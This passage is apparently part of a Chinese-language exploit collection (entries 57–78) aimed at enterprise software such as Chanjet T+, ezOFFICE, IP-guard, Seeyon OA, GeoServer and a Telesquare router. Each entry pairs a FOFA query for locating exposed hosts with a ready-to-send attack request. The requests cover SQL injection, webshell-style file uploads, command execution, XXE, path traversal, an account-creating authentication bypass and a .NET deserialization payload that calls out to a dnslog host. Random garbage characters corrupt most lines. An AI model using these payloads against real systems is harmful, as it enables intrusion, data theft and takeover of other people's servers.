3 ~$ r' h; X# [6 S: _- NContent-Type: application/json* Z6 e* |' k) u% j# r, L5 p
. J& a* W; `! c) H
{
! g2 o% |% g8 Q6 _( ] "storeID":{
: c- ]) P9 I1 A0 w! h, N! j- C# C7 o "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",$ g4 S/ l8 ]- I# q& U
"MethodName":"Start",2 m6 K3 j, @) j0 C. x
"ObjectInstance":{
! J' h0 {# J3 ]* ] "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",, F# z5 ?* W2 j6 d% Z
"StartInfo": {& M5 j0 B/ w. P) w. N0 A8 n
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",; U) C" K. k" `' ? X: D
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
( ?. h$ N+ j; e0 ?* O8 @ }6 {/ ^/ i- A3 Q" q- T
}- F2 R8 G, {8 ]8 u. N3 Z! }: J
}" b4 u0 o% s* x* O
}
# T+ J% m2 |5 l$ `7 O% D
; u4 x' n9 A7 n& U% ^. @) Y2 a
+ p/ I" f" w& x& Q57. 畅捷通T+ keyEdit.aspx SQL注入
- e1 r# B% P5 Z( \2 i# P, ~: b) AFOFA:app="畅捷通-TPlus") V @ ] L! \9 i; l
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1' O) X% o% x) U
Host: host
* g/ w* o+ }; oUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36' [* c3 b6 h+ f W: F3 F: G: x
Accept-Charset: utf-8: V8 ~3 w$ U5 a; F6 j" X
Accept-Encoding: gzip, deflate- I8 } e8 w6 Y7 Z0 A O4 r7 u6 |
Connection: close
9 L) D+ n: S, ^& Q; [' y
# V: E/ S9 z/ O+ J& }7 Y% K: C
& [$ V. N3 B5 Q, j0 z- B" v58. 畅捷通T+ KeyInfoList.aspx sql注入
E; N1 q0 R, n FFOFA:app="畅捷通-TPlus"
: n8 V4 Z4 W1 y A# dGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
6 T5 G i/ Q4 B# b" t9 @1 z3 |Host: your-ip+ i$ _- P* E& P8 u
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.366 }+ W& i1 k! f* `2 ?0 l$ f# T! M
Accept-Charset: utf-8
k' f# R3 G [' d" rAccept-Encoding: gzip, deflate
* ^" `% k9 v1 A6 n- h2 JConnection: close
1 C! x( A7 T- l* F$ q5 \1 L$ k
0 @: Z6 C$ G* W+ ?3 A1 c Z/ \# P1 V1 P0 h2 d7 g! s/ P
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行( r% h- g' {" a- `$ d. ~9 x
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd", N2 E0 t2 {6 J, c% K8 `. i3 M
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1% Z& j8 H$ n# g9 x3 q2 k
Host: 192.168.86.128:9090
1 i7 U9 U( B: ]) M, CUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.361 e, l; L* @/ u |2 q
Connection: close
- p" T: _ x2 d3 M! k) ?Content-Length: 1669
6 c3 S' h) X2 F+ ~/ d, fAccept: */*# i- [' e o, A9 d) M6 S3 [# b
Accept-Language: en' @/ u0 {/ Q* }
Content-Type: application/x-www-form-urlencoded
% W+ ?$ L( z1 X3 L; I: g7 KAccept-Encoding: gzip
6 i( M. T$ ]. a/ h- Q7 Q! N( w8 n y" L0 F2 K: j
PAYLOAD( J m% u3 u; d2 V
. b" y2 U& s2 @5 {; e) S% ^1 B9 f) `- U m" c7 m/ `
60. 百卓Smart管理平台 importexport.php SQL注入2 N9 {: o/ w3 R5 m2 B( z3 `- I8 n
FOFA:title="Smart管理平台"
& ^% q6 X" n0 dGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
( U6 ]/ T7 a" P$ KHost:
. @3 M$ Y) x% i) {# VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. I6 J, W Z6 v+ N; WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ i2 t# p2 f. [, E, M. {0 j5 hAccept-Encoding: gzip, deflate3 b$ r. U6 w3 p, e- S+ _
Accept-Language: zh-CN,zh;q=0.9
; E7 m0 |$ y0 X+ E% f4 I, e' dConnection: close
p5 \$ c7 A& _( A8 M* b
1 ]6 k/ G0 K- f' T% N: L9 T+ C6 H, p4 Y1 V( u
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
) E: p4 o9 \7 n. a1 XFOFA: title="欢迎使用浙大恩特客户资源管理系统"
& B5 O+ U( L0 r( M! pPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
/ V: }) E) K& qHost: x.x.x.x
/ J' w0 a9 F$ g5 k1 X& BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 E: ^3 t2 w1 H1 A6 d3 aConnection: close
/ I" C+ G2 ]- q1 @# q% L- y4 c8 NContent-Length: 27
% Y' B( I O+ O3 u) x& B/ sAccept: */*
" e1 Y% H) W% |2 G0 YAccept-Encoding: gzip, deflate3 a. i; a) Y3 m4 r* i# L" O
Accept-Language: en
8 }4 f+ U) \" ]* @! v0 }* ]. AContent-Type: application/x-www-form-urlencoded: k. m6 ^2 \- a5 k
2 B8 V/ [& M& ?% Q) c) W2 o
8uxssX66eqrqtKObcVa0kid98xa2 e: G) R* ^+ G: I& ~ h
% D% W; r! K) c: @3 z. O" H# h( w: o$ X/ u1 i& R, m: y0 D8 B
62. IP-guard WebServer 远程命令执行
/ e; G, ~7 H! c* X( \FOFA:"IP-guard" && icon_hash="2030860561"0 S+ d% }3 L, J& B
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.14 d) r- v6 Y" p5 F
Host: x.x.x.x
# I& K8 ]* [% y4 o. s4 F7 IUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
( E6 v4 l9 }3 z: q# e/ m5 n6 WConnection: close1 w2 Z/ L. @) b
Accept: */*: x% s$ A8 {7 W0 V
Accept-Language: en
+ M4 K/ I4 U% }0 }3 d: J6 o2 V4 IAccept-Encoding: gzip! L9 Q; n& D5 ~
1 S; d9 X$ {8 [- e1 X: G5 y% \
1 e) `- Y( {( s8 V4 G& _! R& n访问4 y2 N& x5 Q) p1 Y! V: c
/ d i* u9 `- z; Y" H U! `6 M8 JGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1* [* f; @8 w! ^* h( Y% [, O, X
Host: x.x.x.x
$ m: i7 X: X! o( z5 h1 w
0 ?+ a/ _8 S; t. p' q3 b
, v; _, @& ~3 B g5 d9 E- ~3 y63. IP-guard WebServer任意文件读取
$ }9 n2 }2 M, t+ J, O8 xIP-guard < 4.82.0609.0
0 H, t% U- b3 NFOFA:icon_hash="2030860561"
3 K; J; }5 b1 `* e. SPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
4 \5 o7 ]- B3 P" F0 \' O8 L0 OHost: your-ip5 N/ _" }1 p4 r3 i% m2 {! `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.367 f) F4 ~$ W% ?! Y& ?: B) z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# ^% _8 i% e0 l$ ~2 W+ jAccept-Encoding: gzip, deflate3 K6 T6 u9 F/ T5 L/ J4 A
Accept-Language: zh-CN,zh;q=0.9/ w# J' n8 c; u# f% r0 K
Connection: close
9 [8 R0 ]) H& Z) Q( I2 e7 _. RContent-Type: application/x-www-form-urlencoded
' K0 Y) h$ l! c: y I. P5 V# [. s! `- r% K5 E$ E
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
# T# z/ T; g0 T1 w% o
/ L! w, f9 e- Y7 v2 h" Y) l64. 捷诚管理信息系统CWSFinanceCommon SQL注入
5 u" Q' i, I$ m& bFOFA:body="/Scripts/EnjoyMsg.js"
" ]/ L" e3 E/ z7 ePOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1. A/ r& m8 C a' `
Host: 192.168.86.128:9001 T3 R/ }$ k0 z! B) G# c
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36$ d) f9 k, _( |% ? s
Connection: close
@8 R' w1 X) A% s+ \Content-Length: 369
0 A+ e. ?- b' c# ]+ D4 B; p& ^Accept: */*
9 M& M9 `; K2 @/ d. D4 g/ _Accept-Language: en) b+ L$ V) M* J5 C. M
Content-Type: text/xml; charset=utf-8
% s" d2 T* o3 [8 m" x: uAccept-Encoding: gzip
, I, } n" i8 ]! b; n* Q
1 F5 C& J, {) I. N5 r<?xml version="1.0" encoding="utf-8"?>% z. k+ Q; N2 G, I! X- G9 N( C
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
& C+ A" v1 X. N X$ |<soap:Body>) F3 ?. I3 w% I, N
<GetOSpById xmlns="http://tempuri.org/">
2 m4 q8 ^+ \8 F: ~4 s4 Y" C <sId>1';waitfor delay '0:0:5'--+</sId>$ Z1 Y: X0 h# J0 C0 X" P
</GetOSpById>/ u4 y' a% B/ `* z4 U
</soap:Body>
7 l9 |/ ]) P3 [& W k. }* D* i; S</soap:Envelope># V# ?4 }7 t) q9 h
+ j7 I1 h- Z3 j& Z! i$ c! ^) k5 U4 x# F4 c0 M
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
' {4 q/ U6 x Q" e3 ~FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"! w- }! e/ H4 g6 v0 ?9 Z
响应200即成功创建账号test123456/123456
( D2 e+ J! H# [+ ]POST /SystemMng.ashx HTTP/1.1% \" B% g2 h1 ~8 N3 I7 K
Host:% I* c0 P$ N, W* |1 b
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)+ r, g9 J+ S) P6 ^0 M# q2 n
Accept-Encoding: gzip, deflate
, }1 S6 f. e) c* o; x, lAccept: */*7 p% R D$ [" ]2 N) m) x
Connection: close
5 }( U( x9 l# Z' y) |- qAccept-Language: en
- K% i$ a8 e+ o L, NContent-Length: 174
* V) a. |1 H2 d3 e
6 u2 h% s0 y/ |0 l# qoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators. j0 v) t6 D/ Z/ [; {
. _: h$ D5 L+ S ?+ @1 U
' F0 R3 u; z6 {
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
. W" t. J% M3 Y" _& ~FOFA:app="万户ezOFFICE协同管理平台"
* `6 T Y7 k! M4 ~# S
* Z0 d, P* f% _9 NGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1 H2 a# N/ U- b4 Z8 @) |
Host: x.x.x.x2 [8 i- N: h% A- i1 B% p9 q- ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
: A1 Z$ z* E6 [' F: r& m2 o6 YConnection: close' R/ P! [5 @. L9 f6 q, b* l
Accept: */*1 F+ M( F. {+ _& e0 m. w# q
Accept-Language: en7 d* m! c$ L Y! P% u4 |$ q* k% u* k1 R
Accept-Encoding: gzip, k6 J3 y, R) x0 B/ `9 |: D
) R/ U" y3 r) l& N
/ t% I5 _; F# u) X. R
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在% ~; n1 c3 u: ?" _
& K; i& S5 G1 i7 C5 T67. 万户ezOFFICE wpsservlet任意文件上传
1 R$ f. ]+ b) J/ V4 uFOFA:app="万户网络-ezOFFICE", J; d9 d+ o; m; D
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型* v! y' x5 i" r& c A2 f
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.18 i9 v- a) m: `$ @# {
Host: x.x.x.x' @, ~! [ ^$ J
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
1 C$ X3 K% Z/ j, F6 EContent-Length: 173+ X i Q. C; Y4 d2 S# G. J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# A1 ^$ q2 h3 d' N+ A( OAccept-Encoding: gzip, deflate6 X* D( L& ^+ N% `% Q
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3/ G2 J" m; G' n: H M9 A0 m
Connection: close
8 G# x+ f* |! `6 z s m- I- ]Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
% o, i( I9 n9 }, c7 C& t( bDNT: 1
6 k' k$ Z9 y+ p' ?Upgrade-Insecure-Requests: 1
& t$ m0 x) I/ I# a+ P7 W: F
0 c/ B! y, F# f! y; J+ N8 Z& l0 j% N: h--ufuadpxathqvxfqnuyuqaozvseiueerp
* `; {8 _/ x3 u# }* @Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
) x* x/ u# I" C2 C+ F( O% p
: c9 }8 d0 p0 u$ n+ ]' `3 N<% out.print("sasdfghjkj");%>
* R5 ~6 {6 p* [3 F--ufuadpxathqvxfqnuyuqaozvseiueerp--3 C! T& e% s$ y; @- A5 x& d
1 n3 F% P: W& X
4 V+ ]6 O$ R: u7 K
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
; ~7 b0 w: n4 ]5 C; @$ a0 l
\* V0 U3 f0 T/ h( v5 X68. 万户ezOFFICE wf_printnum.jsp SQL注入
% K& R+ w: u1 n8 kFOFA:app="万户ezOFFICE协同管理平台") d( ^+ c( ]- Z
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
# x% U3 J8 j9 t/ C+ n1 F7 uHost: {{host}}7 d4 w3 n" m2 ~9 v, Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
1 s" z |- X' y! s8 t% y0 SAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
! M* R5 R$ B' X5 c5 \3 {$ kAccept-Encoding: gzip, deflate ^" z9 {2 M, ^9 Z
Accept-Language: zh-CN,zh;q=0.9% ]+ f$ m5 U6 w8 ]% S6 E
Connection: close# f, g% u' p; h% F; d+ t- }) k* N
% }, _* ^5 G$ A9 G- R2 k
* P. H u3 I: A6 U" Y# @$ U _69. 万户 ezOFFICE contract_gd.jsp SQL注入8 b4 a- [+ r9 g" h$ s
FOFA:app="万户ezOFFICE协同管理平台"
: A8 W8 }6 F& }: y% L* e# J0 PGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
" m$ l5 N: t" ~8 Y5 W9 sHost: your-ip" e! {& y5 i0 h, t
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
$ y$ E7 W5 X- x$ ?3 [Accept-Encoding: gzip, deflate W- n1 j6 l2 `0 [! r9 M N4 C
Accept: */*
$ q$ P, T+ ~1 sConnection: keep-alive7 e1 }6 |' S8 y" D% t
$ H# x0 M- T4 Z( D) D9 `/ I
( V6 `0 y: J7 M) |" e9 n' c* W
70. 万户ezEIP success 命令执行7 A# \/ H1 `* q
FOFA:app="万户网络-ezEIP"
& N7 z8 h' f* oPOST /member/success.aspx HTTP/1.1
) a9 ~8 E+ K3 m d$ ?Host: {{Hostname}}; _7 r/ k) x2 g4 H* R. v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.361 g8 z, U+ b: P
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
+ y, E1 ^: } P3 s- pContent-Type: application/x-www-form-urlencoded9 z$ }4 @5 ~ Z' w. |
TYPE: C
6 V& ]( i6 S! a! L/ PContent-Length: 16702
' s7 [) y3 n! ?1 K
) v* Z. H$ P+ _! a__VIEWSTATE=PAYLOAD& l( V+ U* x3 q1 B
- H* W1 w" J! P
5 J; C! S- I+ W- n1 ^/ `
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入8 `1 P8 S! P/ r6 S
FOFA:body="PM2项目管理系统BS版增强工具.zip"
# @& e, N+ m/ i8 P- P/ R* EGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
2 S7 w5 W4 X6 p# X& |; G; u: _- rHost: x.x.x.xx.x.x.x1 D" k, L* [. P: ?. |# x5 ?' S
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36/ b4 z" @2 l$ U5 R( ?# d# f _
Connection: close
0 @& c/ J: q7 U p: [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 v3 T' C- x; w) B& A: k8 jAccept-Encoding: gzip, deflate
) {' [. M, I/ Q! _$ t* E2 }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% ]1 t& U$ t1 dUpgrade-Insecure-Requests: 1
# ~& H8 [; ?8 }. o! Z; i& H$ r% V: @
8 G% a7 f# z6 z+ F1 A6 z
72. 致远OA getAjaxDataServlet XXE
+ j1 D8 j$ P6 N; ZFOFA:app="致远互联-OA". E5 @ N$ z, w& C" z
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
4 u$ }6 p' U8 s" y- W# j0 A% g5 qHost: 192.168.40.131:8099
9 E0 y- c. @8 O6 |. _9 H% Y9 EUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
8 O' Y% l8 \* Y/ f; eConnection: close
& S0 `7 m7 F5 w) t! D" l$ q8 \. ?2 dContent-Length: 583
9 \0 n5 v% ~% Y4 Z2 ^) iContent-Type: application/x-www-form-urlencoded6 z. [+ t( |" H' G3 V' u
Accept-Encoding: gzip
" u2 A8 B- H9 Y( _# }+ z+ h/ U s% x% i+ d1 f
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E$ \+ C$ P0 J% T% G2 y: E9 b4 @
0 c4 H s( C" W$ t3 A7 R
, j! `9 {, ]7 n7 ]( j73. GeoServer wms远程代码执行* u; B8 l% H7 L
FOFA:icon_hash=”97540678” k- M8 \. P1 M! Y% ]" l4 F! N& y1 }
POST /geoserver/wms HTTP/1.1- W- y; H2 w0 g T! u) [0 t3 L
Host:# `) d- B0 Q" m* {0 H d6 q7 p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36- |0 j# W5 g |; W
Content-Length: 1981
# r5 S" `6 H; M3 J5 t: p8 IAccept-Encoding: gzip, deflate
) [1 P% S" F; u4 d. I% j0 q' HConnection: close$ W* P" ^, [* h, T
Content-Type: application/xml! a) n# U4 Q z6 J* V1 h' n" k/ h
SL-CE-SUID: 3
) c# c( r" Q4 i3 c9 A
Q1 y/ j6 _- b% c% SPAYLOAD
8 V; T7 A+ e0 n# Y% ]0 B
1 \( n# u& r8 J9 X8 {) Z
9 Y, O0 M; { o4 l+ v74. 致远M3-server 6_1sp1 反序列化RCE) U; l- o4 p- w( A! ^8 J* C
FOFA:title="M3-Server"+ P3 \8 K0 F) g0 G5 A+ G/ u
PAYLOAD
9 f% _' U* g9 m8 D1 d+ Z9 }" o4 \' ^) K
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
/ ^0 n$ T/ e. x- F8 N, EFOFA:app="TELESQUARE-TLR-2005KSH"
; m/ h& m4 V3 i, S, PGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1! Y( o- G C" }/ f$ G
Host: x.x.x.x2 u0 {1 i1 k; r2 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( _/ e& S* i, Y% \; g7 NConnection: close$ F; P V/ K2 A# N+ J6 G% P
Accept: */*
$ z: o, Q& L9 s1 E+ bAccept-Language: en
8 I; D9 s6 o0 d. l2 Z2 K6 P0 U& zAccept-Encoding: gzip8 T5 j# C5 b/ y# Z1 P! t
' r: R6 t4 P6 f/ c: ~9 `) [/ K/ h* y" Y+ o0 o; f3 I$ p8 s" j
GET /cgi-bin/test28256.txt HTTP/1.1
7 r0 R$ L# h. X' YHost: x.x.x.x: x2 [5 J& a; P5 {+ Q
; F5 [+ A2 Y/ V7 F
: D' z! Z2 M. G* \- X8 J76. 新开普掌上校园服务管理平台service.action远程命令执行
1 W5 v( a0 D$ |2 ?2 A: p4 P1 ~FOFA:title="掌上校园服务管理平台"5 H% b& L8 a6 J0 V* \3 e
POST /service_transport/service.action HTTP/1.10 ~& \/ [' w# l+ E' r
Host: x.x.x.x
/ q0 m6 J+ |/ C- V: C( P- z+ i+ G/ ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.04 d8 a$ @( ^) Y9 k+ z: w! x
Connection: close5 }! `8 J1 Q& p5 [
Content-Length: 211
. e0 p0 I' `6 z& z) _/ w T v* RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 u: T) w) F) p. D
Accept-Encoding: gzip, deflate$ `8 a! s. P# L' y& s* f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# a% S# a' b5 }9 ?
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
5 l# m$ W% N* Z- {" q/ v3 {Upgrade-Insecure-Requests: 1: u4 R: S! Q% e& M
+ q" e' @) j* A$ y2 ~. j{, p. e& C+ @: c, i5 y8 N
"command": "GetFZinfo",7 r+ y F# @' [( B9 K. S5 P% [7 u
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
/ G9 {% X! H0 v7 R$ I2 V) q6 a1 w/ u ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"! Q: H! s5 ~+ ~$ ^: C3 E
}
" |+ m! n- A. d* \0 g
! S7 {4 G( s) [) s! z$ m, H& R1 \ [) E5 P {" s
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
2 q( `& a1 {! xHost: x.x.x.x
0 k' v, U* ?2 U' n' ^9 J V! U! V$ @) |0 \, V. J9 }
6 [) ]5 \6 e; P/ X
6 S- m4 G+ e2 h$ {. J3 z7 j' ^8 b77. F22服装管理软件系统UploadHandler.ashx任意文件上传9 w+ ]5 ?. L2 f" P+ @
FOFA:body="F22WEB登陆") W/ D1 P9 Z; A. m, B
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
. L2 v+ b' N' ^" b" g& BHost: x.x.x.x
! \6 H$ M+ Z) D2 f4 u: L4 SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
% H3 A* }7 I( r- _Connection: close5 I" A+ L$ j5 F Z$ W4 b
Content-Length: 433
8 [: @6 G4 h7 K9 C5 ZAccept: */*
6 d* y9 J6 _; \Accept-Encoding: gzip, deflate
% N/ t: O6 ^" H+ Y. MAccept-Language: zh-CN,zh;q=0.9
% Z: V0 A( `4 r$ X+ B9 d" oContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
/ \& u- q A7 V6 H; J
4 Y5 a& E* _' q0 W0 J------------398jnjVTTlDVXHlE7yYnfwBoix W' K' O/ V6 q) t0 p6 O8 ~
Content-Disposition: form-data; name="folder"
8 B' `7 w p4 ^1 E: C, }, R, S' `. F$ E4 z5 Y$ \
/upload/udplog
2 G! b( B/ A1 m' Z------------398jnjVTTlDVXHlE7yYnfwBoix' \# N& {( y( l1 p0 T9 G; j
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
8 |4 U1 l6 W3 [% HContent-Type: application/octet-stream
3 l, j# @' G) v& f8 `; E3 Z7 s! ~( y6 O( _
hello1234567
, ?* `5 C- Z" h------------398jnjVTTlDVXHlE7yYnfwBoix
+ F# c& S- o/ b8 BContent-Disposition: form-data; name="Upload"( c# P3 z$ @: d! B( }) D) U- P
+ A8 l; j) M) p1 s* G7 qSubmit Query' l) x9 U% ?9 ?$ |3 |0 {1 V
------------398jnjVTTlDVXHlE7yYnfwBoix--8 I( i7 w" c [, i
- g$ j/ [) {- V' V0 Y/ o6 L% |; o! p% s
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传1 O0 [8 e1 o8 N3 _
FOFA:icon_hash="2001627082"
" \* i' }0 Q" t3 N* S8 WPOST /Platform/System/FileUpload.ashx HTTP/1.1
) a! G U+ A. N! [8 C0 KHost: x.x.x.x" J/ z; X/ ^3 B" C% ~/ O b/ z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) L- p: T9 s, D
Connection: close
# \# j3 X8 F" A& q/ D0 RContent-Length: 3362 K" G( I7 Y/ l" S4 ^
Accept-Encoding: gzip
5 ~: l2 K) |- QContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
/ Y# A; B- r% `, u7 T6 u$ F" q5 n8 g8 E& m3 p5 l& r
------YsOxWxSvj1KyZow1PTsh98fdu6l5 W9 R6 |$ N! B! H; P
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"0 }5 E6 X& q: @0 |8 u* _. |" p: Y
Content-Type: image/png: ?& m+ X( \/ j& q
, \0 F# c( P% l9 O
YsOxWxSvj1KyZow1PTsh98fdu6l
3 K' p, F% u/ A- E: H% L! M# @------YsOxWxSvj1KyZow1PTsh98fdu6l
- N, u1 Q6 N- K+ tContent-Disposition: form-data; name="target"+ D- J" [! ^& @( @/ h. J
% m3 \4 C* g- C
/Applications/SkillDevelopAndEHS/
